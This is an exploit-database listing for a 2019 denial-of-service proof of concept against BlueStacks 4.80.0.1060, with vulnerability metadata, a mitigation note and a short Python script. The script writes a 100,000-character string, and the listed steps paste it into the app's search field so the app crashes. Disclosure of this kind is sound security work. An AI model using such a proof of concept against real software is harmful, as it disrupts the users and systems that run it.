header-logo
Suggest Exploit
vendor:
BlueStacks
by:
Alejandra Sánchez
7.8
CVSS
HIGH
Denial of Service
119
CWE
Product Name: BlueStacks
Affected Version From: 4.80.0.1060
Affected Version To: 4.80.0.1060
Patch Exists: YES
Related CWE: N/A
CPE: a:bluestacks:bluestacks
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2019

BlueStacks 4.80.0.1060 – Denial of Service (PoC)

A denial of service vulnerability exists in BlueStacks 4.80.0.1060 due to a buffer overflow when copying a large amount of data to the clipboard. An attacker can create a file containing a large amount of data and copy it to the clipboard, which will cause the application to crash.

Mitigation:

Upgrade to the latest version of BlueStacks.
Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: BlueStacks 4.80.0.1060 - Denial of Service (PoC)
# Date: 21/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.bluestacks.com
# Software: https://www.bluestacks.com/download.html?utm_campaign=bluestacks-4-en
# Version: 4.80.0.1060
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script 'Bluestacks.py', it will create a new file 'exploit.txt'
# 2.- Copy the text from the generated exploit.txt file to clipboard
# 3.- Open BlueStacks
# 4.- Paste clipboard in the search field and click on the search button
# 5.- Crashed

buffer = "\x41" * 100000

f = open ("exploit.txt", "w")
f.write(buffer)
f.close()

Navigation

Suggest Exploit

Services By CQR